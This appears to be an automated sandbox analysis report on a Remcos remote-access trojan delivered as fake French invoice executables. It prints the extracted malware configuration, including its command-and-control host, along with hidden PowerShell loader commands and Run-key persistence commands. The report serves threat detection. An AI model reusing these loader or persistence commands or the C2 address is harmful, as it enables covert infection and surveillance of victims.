Analysis
-
max time kernel
246s -
max time network
519s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22/10/2024, 21:56
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://u.pcloud.link/publink/show?code=5Zf3P75ZMNH3QVaYuvJZP2q07Z8IKVmuclwkBMhjhKfkjRnBgqmsDV
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
https://u.pcloud.link/publink/show?code=5Zf3P75ZMNH3QVaYuvJZP2q07Z8IKVmuclwkBMhjhKfkjRnBgqmsDV
Resource
win10v2004-20241007-en
General
Malware Config
Extracted
remcos
RH18
blackrockxp.dyndns.org:28188
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
drrrrrrr
-
mouse_option
false
-
mutex
Rmc-N94NPU
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3320 powershell.exe 2792 powershell.exe 51476 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DEVIS + FACTURE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ORDRE_DE_VIREMENT_SIGNE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133741078376840250" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 74272 reg.exe 26008 reg.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 3660 chrome.exe 3660 chrome.exe 504 chrome.exe 504 chrome.exe 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 3320 powershell.exe 3320 powershell.exe 2792 powershell.exe 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe 2792 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe Token: SeShutdownPrivilege 3660 chrome.exe Token: SeCreatePagefilePrivilege 3660 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe 3660 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3660 wrote to memory of 3412 3660 chrome.exe 74 PID 3660 wrote to memory of 3412 3660 chrome.exe 74 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 2212 3660 chrome.exe 76 PID 3660 wrote to memory of 3644 3660 chrome.exe 77 PID 3660 wrote to memory of 3644 3660 chrome.exe 77 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78 PID 3660 wrote to memory of 780 3660 chrome.exe 78
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://u.pcloud.link/publink/show?code=5Zf3P75ZMNH3QVaYuvJZP2q07Z8IKVmuclwkBMhjhKfkjRnBgqmsDV1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffab5359758,0x7ffab5359768,0x7ffab53597782⤵PID:3412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:22⤵PID:2212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1776 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:3644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2872 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:2316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:2256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4376 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:2652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3568 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:4328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:2244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5424 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=948 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:46396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:59068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3664 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:82⤵PID:36868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3824 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:110956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3568 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:57000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4752 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:110604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5332 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:113284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=816 --field-trial-handle=1852,i,8156815920184747792,1150518161057266502,131072 /prefetch:12⤵PID:155152
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4288
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:4564
-
C:\Users\Admin\Downloads\FACTURE+AVIS DE VIREMENT\FACTURE+AVIS DE VIREMENT\DEVIS + FACTURE.exe"C:\Users\Admin\Downloads\FACTURE+AVIS DE VIREMENT\FACTURE+AVIS DE VIREMENT\DEVIS + FACTURE.exe"1⤵
- System Location Discovery: System Language Discovery
PID:624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Runas=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\halfword\Alteregoism.Gho';$Sigmaets=$Runas.SubString(54049,3);.$Sigmaets($Runas)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3320 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵PID:63620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fjerntrafikkerne" /t REG_EXPAND_SZ /d "%Tinsoldaters% -windowstyle 1 $Palmella=(gp -Path 'HKCU:\Software\unbillable\').Bagleaves;%Tinsoldaters% ($Palmella)"4⤵PID:107460
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fjerntrafikkerne" /t REG_EXPAND_SZ /d "%Tinsoldaters% -windowstyle 1 $Palmella=(gp -Path 'HKCU:\Software\unbillable\').Bagleaves;%Tinsoldaters% ($Palmella)"5⤵
- Modifies registry key
PID:26008
-
-
-
-
-
C:\Users\Admin\Downloads\FACTURE+AVIS DE VIREMENT\FACTURE+AVIS DE VIREMENT\ORDRE_DE_VIREMENT_SIGNE.exe"C:\Users\Admin\Downloads\FACTURE+AVIS DE VIREMENT\FACTURE+AVIS DE VIREMENT\ORDRE_DE_VIREMENT_SIGNE.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Medics=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\halfword\Slambassins.Nai';$Godmodig=$Medics.SubString(10346,3);.$Godmodig($Medics)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Jumpersettings" /t REG_EXPAND_SZ /d "%Feriere% -windowstyle 1 $Roadbeds=(gp -Path 'HKCU:\Software\Samfundsbevidste\').Auktionsrunde;%Feriere% ($Roadbeds)"3⤵PID:35476
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Jumpersettings" /t REG_EXPAND_SZ /d "%Feriere% -windowstyle 1 $Roadbeds=(gp -Path 'HKCU:\Software\Samfundsbevidste\').Auktionsrunde;%Feriere% ($Roadbeds)"4⤵
- Modifies registry key
PID:74272
-
-
-
-
C:\Users\Admin\Downloads\FACTURE+AVIS DE VIREMENT\FACTURE+AVIS DE VIREMENT\ORDRE_DE_VIREMENT_SIGNE.exe"C:\Users\Admin\Downloads\FACTURE+AVIS DE VIREMENT\FACTURE+AVIS DE VIREMENT\ORDRE_DE_VIREMENT_SIGNE.exe"1⤵PID:30680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Medics=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\halfword\Slambassins.Nai';$Godmodig=$Medics.SubString(10346,3);.$Godmodig($Medics)"2⤵
- Command and Scripting Interpreter: PowerShell
PID:51476
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
288B
MD55df2cdbf40312baac0e07d12425dbb74
SHA13b50e5f38ef45dba8e8ef7e4106ba63e80e62ff4
SHA2564aa7f01a6606f4fe08e3f937b3262f7e93017247ea0a3b0a7346b10d82827319
SHA512280df6682dfef1823cf28f5fe0fcc7e36eab42806c793b5378a0ae804dcc7e32f6a4962f10aa7fdadf48a908fe9a38cc49f88fbf619464235ae8ef85760752a3
-
Filesize
1024B
MD53e9dbee96c641da3c4f4f19abce5c92c
SHA1ae2bab377d3569135cc4d08a948455d3d38cca7a
SHA25600f9f8c3d9af58e00cfe76953e61ac1282afd0222b6eda029b2aa7f6a3ff2c06
SHA512570c6e5561eba1583980955453d0d8df285ee14ad68345a7b315ed6e241ea5644e0a48534df07241b81bcdf667207e7a7842f74010970938f60f436d160bc61c
-
Filesize
1KB
MD5f1c0e346e329096810ac31fa7d09e9f2
SHA1f989357ab8f444df9878966fa325e9c2c803a8ed
SHA256d01fe88cebb9355d00534c9eaf37ab82d2ec782efc133e2bdc3a521b71ed8594
SHA51200be145d4d5ed9647ccbe1e6d0d628e80352aae426941de22dd432ee8978d1a499b6173f2416013a07d5ea962f4dc967d69ea53387b7a7c6e1e16fecd6a00e01
-
Filesize
875B
MD5843baaf58c65a173252c9226404b6d61
SHA1564b822224c8f86adc161d865d9c3dea4e08dee0
SHA256ce0487dccd391f6e925dc3df83330324cb5b4a6240174a3d63d8560660f726c2
SHA51228dc1a9e48da06063304b3b5f3e1aa4a2ac4e0796ab4cea403ec386645852bfe88e3ef7ee51c78cd83f367d8a812e00e2d6136c14a153b229510ff6a0562578c
-
Filesize
875B
MD515895aefa2b3502ef3db0e465be690d2
SHA152f72f23ed1c94560ef69a5e712c12a56673bc98
SHA256bfd7fe60a156b19a9e67aa3293337c52d8d083e41c5c64bcfaca7d9a7b46c565
SHA512aa664ac6fa5c6cdc807ed265d2fe6f8b1b6becf347ecdbf360046f94aea8f4aa2c7b12b6b958176a5cc5b8dbb2bc1a9f04a839e1411beab994fdbb068f998bc2
-
Filesize
875B
MD515d1a246c961469c62853087936f7b46
SHA12f7caa9d8b6c5a21bbe6766f606c12f00b3ed915
SHA256f79b7a730bfd35fc977d9d54b75bc2e1081fa5655899e7d725d9bd6fd18cd347
SHA512a08f5465074fe2ca6635c3c57d9174cdd99c02050219fd3edc9a8e21d4181b3e82adc078e520832788624d155cac2290938d1f071345b8a494d45f004092f3fe
-
Filesize
6KB
MD5de49bb42d1a97dd6d89e57fae81f4623
SHA16c302a6f84be1410acea15cc5ce0a20e3cd10aa2
SHA25666b3cf85a0ff1485f009c5c42f61ef95f175eefc9e4487a3453d29f3372c249f
SHA5127470385bedbf5d146a49ebdddd76372be1377c57a8d438e08ef4aa401f85324a0a843f19133918a40882c1d853d5d56d2564c2ae8a21781258838a133aab7a31
-
Filesize
6KB
MD5f1c0a952750d54eae8e44660ca9f1d72
SHA1bd7923e59c008187e0e5580e3cea22969eb2d468
SHA256b97a0960f720f01362e476f60107aa888059a8ada57bc991f969a8f28b90a68f
SHA51269713750ecd0aba05fab6caade27d5aab81c4903e2ef74e57105cbe358e602762c42dd382ef08a02d3f407f9c2fef0dbef02039260c6b94d5a82314d14381f24
-
Filesize
6KB
MD519a6591df77dd24ad9340d7c94946e1c
SHA1ec7109c178695a187a7db3a2b0853173acec4d65
SHA256c70a38d553ff6ca45b91c8890d7263ca6975a71c1d1838b2c799fa48d6c95298
SHA512b37aa8fa8795660e75c48675d6edb364a65b3a2bce9c2af6d2642845e211f5d220e22e6318a4d905e576eb1fdb6519618771d03df415557dd200680c89703465
-
Filesize
6KB
MD5dc2d8500dd7cf3596013d3dd85e92a2d
SHA14800e23d2db1bf4bfec468ba32191e05b9849c2f
SHA2562ca35f29df027e450602b693d02e57ba97e861823ba3c5dee3617d01aec47204
SHA512d0b49b40291187225302c78b813634abb25e25e0284518c126ddd32d17227507cb6dfee2f7a59ac10c4bfde99fee1fe2e43f3d03528e43499637b62ef98711ab
-
Filesize
6KB
MD5c5b0575410c933f5819e66b814ac0fd2
SHA1c591ae86bb262646115fa82843231e4d7e35f179
SHA25615eb38e644d4022ef9b9003bebb439676cec2fabd38b72dfa847dac96436cf1e
SHA51286e987d36d19bada961b4c7edefa83e51d354a8f2c14cf0b920eb29c83cdfb85317e932477caa2b4a8a6eb26677df5d55bc1ed98572972b1212cf59c4ed51f1e
-
Filesize
6KB
